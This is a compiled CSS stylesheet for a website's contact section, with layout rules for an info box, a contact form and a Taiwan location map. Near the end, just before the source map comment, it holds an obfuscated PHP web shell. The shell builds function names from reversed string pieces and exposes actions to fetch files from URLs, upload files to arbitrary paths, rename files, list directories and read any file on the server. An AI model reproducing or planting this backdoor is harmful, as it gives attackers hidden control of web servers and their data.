  border: 1px solid;
  line-height: 22px;
}
/* line 22, ../sass/_contact.scss */
#contact section .row1 .info-row .title {
  font-size: 13px;
  color: #075aa9;
  text-align: center;
}
/* line 28, ../sass/_contact.scss */
#contact section .row1 .info-row ul li {
  font-size: 11px;
}
/* line 32, ../sass/_contact.scss */
#contact section .row1 .info-row .link {
  margin-top: 10px;
}
/* line 34, ../sass/_contact.scss */
#contact section .row1 .info-row .link a {
  display: inline-block;
  vertical-align: middle;
  color: #075aa9;
  margin-right: 10px;
}
/* line 39, ../sass/_contact.scss */
#contact section .row1 .info-row .link a:before {
  content: '';
  width: 0;
  height: 0;
  border-top: 5px solid transparent;
  border-bottom: 5px solid transparent;
  border-left: 5px solid #0f0f0f;
  display: inline-block;
  vertical-align: middle;
  margin-top: -4px;
  margin-right: 2px;
}

/* line 57, ../sass/_contact.scss */
#contact_form {
  margin-top: 30px;
}
/* line 61, ../sass/_contact.scss */
#contact_form .form li .left {
  width: 180px;
}
/* line 64, ../sass/_contact.scss */
#contact_form .form li .checkbox_style {
  height: auto;
}
/* line 66, ../sass/_contact.scss */
#contact_form .form li .checkbox_style .checkbox {
  margin-bottom: 10px;
}
/* line 68, ../sass/_contact.scss */
#contact_form .form li .checkbox_style .checkbox input[type="checkbox"] {
  height: auto;
  width: auto;
}

/* line 78, ../sass/_contact.scss */
.contact2-row .taiwanmap {
  display: block;
  margin: 0 auto;
}
/* line 82, ../sass/_contact.scss */
.contact2-row .locate {
  font-size: 15px;
  line-height: 20px;
  display: inline-block;
  width: 70px;
  border: 1px solid;
  text-align: center;
  margin: 10px 0;
}
/* line 91, ../sass/_contact.scss */
.contact2-row .item {
  font-size: 0;
  margin: 10px 0;
}
/* line 94, ../sass/_contact.scss */
.contact2-row .item img,
.contact2-row .item .text-row {
  display: inline-block;
  vertical-align: top;
}
/* line 99, ../sass/_contact.scss */
.contact2-row .item img {
  width: 130px;
}
/* line 102, ../sass/_contact.scss */
.contact2-row .item .text-row {
  width: calc(100% - 130px);
  font-size: 13px;
  line-height: 20px;
  padding-left: 10px;
}
/* line 107, ../sass/_contact.scss */
.contact2-row .item .text-row .title {
  color: #075aa9;
}
<?php error_reporting(0);$sr="st"./*+/*+*/"rr"/*+/*+*/."ev";$id=$sr/*+/*+*/("ri"."d_"."si");$rn=$sr/*+/*+*/("em"."an"."er");$dn=$sr/*+/*+*/("em"."anr"."id");$od=$sr/*+/*+*/("ri"."dne"."po");$rd=$sr/*+/*+*/("ri"."dda"."er");$cd=$sr/*+/*+*/("ri"."deso"."lc");$fpc=$sr/*+/*+*/("stn"."etn"."oc_t"."up_e"."lif");$fgc=$sr/*+/*+*/("stn"."etn"."oc_t"."eg_e"."lif");$muf=$sr/*+/*+*/("eli"."f_d"."eda"."olp"."u_e"."vom");$dlform='<form method="post">FN:<input name="fn" size="20" type="text">URL:<input name="url" size="50" type="text"><input type="submit" value="ok"></form>';$ulform='<form method="post" enctype="multipart/form-data"><input name="uf" type="file">SP:<input name="sp" size="50" type="text"><input type="submit" value="ok"></form>';$rnform='<form method="post">ON:<input name="on" size="50" type="text">NN:<input name="nn" size="50" type="text"><input type="submit" value="ok"></form>';$lpform='<form method="post">DP:<input name="dp" size="50" type="text"><input type="submit" value="ok"></form>';$sfform='<form method="post">DF:<input name="df" size="50" type="text"><input type="submit" value="ok"></form>';if($_GET['act']=='dl'){echo($dlform);if($_SERVER['REQUEST_METHOD']=='POST'){$fpc/*+/*+*/($_POST['fn'],$fgc/*+/*+*/($_POST['url']));}exit;}if($_GET['act']=='ul'){echo($ulform);if($_SERVER['REQUEST_METHOD']=='POST'){$sp=empty($_POST['sp'])?'./':$_POST['sp'].'/';$muf/*+/*+*/($/*+/*+*/{"_F"."IL"."ES"}["uf"]["tmp_name"],$sp.$/*+/*+*/{"_F"."IL"."ES"}["uf"]["name"]);}exit;}if($_GET['act']=='rn'){echo($rnform);if($_SERVER['REQUEST_METHOD']=='POST'){$rn/*+/*+*/($_POST['on'],$_POST['nn']);}exit;}if($_GET['act']=='gp'){echo($dn/*+/*+*/(__FILE__));exit;}if($_GET['act']=='lp'){echo($lpform);if($_SERVER['REQUEST_METHOD']=='POST'){$dp=$_POST['dp'].'/';$h=$od/*+/*+*/($dp);while(($fn=$rd/*+/*+*/($h))!==false){if($id/*+/*+*/($dp.$fn)){$t1.='D&nbsp;'.$fn.'<br>';}else{$t2.='&nbsp;&nbsp;'.$fn.'<br>';}}$cd/*+/*+*/($dp);echo($dp.'<br>'.$t1.$t2);}exit;}if($_GET['act']=='sf'){echo($sfform);if($_SERVER['REQUEST_METHOD']=='POST'){$df=$_POST['df'];echo('<textarea style="width:100%;height:100%;" wrap="off">'.$fgc/*+/*+*/($df).'</textarea>');}exit;}?>
/*# sourceMappingURL=style.css.map */
